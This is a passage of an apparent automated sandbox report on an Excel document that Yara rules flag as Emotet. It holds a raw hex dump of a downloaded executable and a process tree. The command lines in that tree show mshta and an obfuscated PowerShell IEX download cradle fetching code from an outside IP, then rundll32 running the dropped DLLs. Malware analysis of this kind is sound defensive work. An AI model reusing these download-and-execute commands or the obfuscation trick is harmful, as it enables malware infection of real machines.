00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
Jan 28, 2022 21:37:47.614202976 CET	18	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:37:47.614243031 CET	19	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:37:47.614283085 CET	20	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:37:47.614337921 CET	22	IN	Data Raw: 89 4d f8 8b 4d f8 e8 4f 00 00 00 89 45 fc 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc Data Ascii: MMOEM]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>
Jan 28, 2022 21:37:47.614378929 CET	23	IN	Data Raw: 01 89 45 10 85 d2 74 13 8b 4d fc 8a 55 fb 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 Data Ascii: EtMUEEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;Mr
Jan 28, 2022 21:37:47.614418983 CET	25	IN	Data Raw: 00 eb 12 8b 4d fc 83 c1 01 89 4d fc 8b 55 e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 Data Ascii: MMU(UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUR
Jan 28, 2022 21:37:47.614458084 CET	26	IN	Data Raw: 45 0c 50 8b 4d 08 51 ff 15 a8 62 04 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 Data Ascii: EPMQb]UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WE
Jan 28, 2022 21:37:47.614497900 CET	27	IN	Data Raw: 8b 4d fc 8b 55 f0 03 51 24 89 55 e0 c7 45 ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 Data Ascii: MUQ$UEEEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQU
Jan 28, 2022 21:37:47.614538908 CET	29	IN	Data Raw: 30 05 10 0f af 15 c8 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b Data Ascii: 0000++0+0000000+000000++0+0000000+000000++0+00
Jan 28, 2022 21:37:47.793796062 CET	30	IN	Data Raw: 2b 0d c4 30 05 10 a1 c0 30 05 10 0f af 05 c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30 Data Ascii: +000+00+0+000+0000+00+000++00000++00+000+00+0+000+00

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 2592, Parent PID: 596

General

Target ID:	0
Start time:	21:37:19
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fe50000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2696, Parent PID: 2592

General

Target ID:	2
Start time:	21:37:21
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x4a3e0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: mshta.exePID: 2564, Parent PID: 2696

General

Target ID:	4
Start time:	21:37:22
Start date:	28/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x13f230000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2908, Parent PID: 2564

General

Target ID:	6
Start time:	21:37:24
Start date:	28/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Imagebase:	0x13f090000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2656, Parent PID: 2908

General

Target ID:	8
Start time:	21:37:56
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Imagebase:	0x49e30000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 236, Parent PID: 2656

General

Target ID:	9
Start time:	21:37:56
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.496880032.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2308, Parent PID: 236

General

Target ID:	10
Start time:	21:38:00
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547984454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547866733.0000000002771000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547659879.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548291144.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547521554.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547234287.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548336620.0000000003151000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547596070.00000000007F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548156511.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548385196.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547739583.0000000002321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.547820098.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548085066.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.548199162.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1456, Parent PID: 2308

General

Target ID:	11
Start time:	21:38:19
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",JsCTpK
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.549722399.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.549782146.0000000000641000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1832, Parent PID: 1456

General

Target ID:	13
Start time:	21:38:24
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",DllRegisterServer
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.601617867.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.603206578.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.603148203.0000000003071000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602465410.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602135379.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602581342.0000000002741000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602649396.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.603002835.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602710616.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602062854.00000000006D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602269654.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602677407.0000000002901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602340992.00000000020A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602833934.0000000002E01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.602929583.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1200, Parent PID: 1832

General

Target ID:	14
Start time:	21:38:44
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",XsUjAXLCR
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.605063883.0000000000251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.605845584.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.605017420.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2748, Parent PID: 1200

General

Target ID:	15
Start time:	21:38:50
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",DllRegisterServer
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656694958.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.657128766.0000000003081000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656764278.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656508765.0000000000530000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656455241.0000000000501000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656807259.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.657039086.0000000002BE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656328643.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656913547.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656273898.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.657011784.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.657099652.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.657195935.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656380451.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.656726745.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2540, Parent PID: 2748

General

Target ID:	16
Start time:	21:39:10
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",XxjhIN
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.659295124.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.658858543.00000000002E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.658681536.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1972, Parent PID: 2540

General

Target ID:	17
Start time:	21:39:15
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",DllRegisterServer
Imagebase:	0x820000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677590438.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680400324.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677534692.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677470138.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677639704.0000000000291000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: mshta.exePID: 2564, Parent PID: 2696COMMON

Executed Functions

Function 0357311C Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418852458.0000000003573000.00000010.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Associated: 00000004.00000003.418822300.0000000003570000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3570000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867dc6912b18bf90cdb20e4244e2834aebfb6a99780680189dc15559d4ad3b25
Instruction ID: 06c4cb37fee46a9486b9910b850aa7af8d0e771e81cc487afdbd327c21565299
Opcode Fuzzy Hash: 867dc6912b18bf90cdb20e4244e2834aebfb6a99780680189dc15559d4ad3b25
Instruction Fuzzy Hash: 9251F62071CA8C4FC749EF1CA849A30B7D1FB5C310B4984EEE48AC72A2DA64DC85C795

Uniqueness

Uniqueness Score: -1.00%

Function 0357311C Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418852458.0000000003573000.00000010.00000800.00020000.00000000.sdmp, Offset: 03573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3570000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867dc6912b18bf90cdb20e4244e2834aebfb6a99780680189dc15559d4ad3b25
Instruction ID: 06c4cb37fee46a9486b9910b850aa7af8d0e771e81cc487afdbd327c21565299
Opcode Fuzzy Hash: 867dc6912b18bf90cdb20e4244e2834aebfb6a99780680189dc15559d4ad3b25
Instruction Fuzzy Hash: 9251F62071CA8C4FC749EF1CA849A30B7D1FB5C310B4984EEE48AC72A2DA64DC85C795

Uniqueness

Uniqueness Score: -1.00%

Function 03573312 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418852458.0000000003573000.00000010.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Associated: 00000004.00000003.418822300.0000000003570000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3570000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315ca0e06666d175a480362de32dab02ea97517150563eeaba0c89bc170adc4f
Instruction ID: b881c8fab7671d92671e5493673b262983b5031b5b32a8a24277b497bcb360a8
Opcode Fuzzy Hash: 315ca0e06666d175a480362de32dab02ea97517150563eeaba0c89bc170adc4f
Instruction Fuzzy Hash: 0CD012651096C58ED316E37934160383B71EA5528C31804C7998ADA263DA005D915396

Uniqueness

Uniqueness Score: -1.00%

Function 03573312 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418852458.0000000003573000.00000010.00000800.00020000.00000000.sdmp, Offset: 03573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3570000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315ca0e06666d175a480362de32dab02ea97517150563eeaba0c89bc170adc4f
Instruction ID: b881c8fab7671d92671e5493673b262983b5031b5b32a8a24277b497bcb360a8
Opcode Fuzzy Hash: 315ca0e06666d175a480362de32dab02ea97517150563eeaba0c89bc170adc4f
Instruction Fuzzy Hash: 0CD012651096C58ED316E37934160383B71EA5528C31804C7998ADA263DA005D915396

Uniqueness

Uniqueness Score: -1.00%

Function 03170F11 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
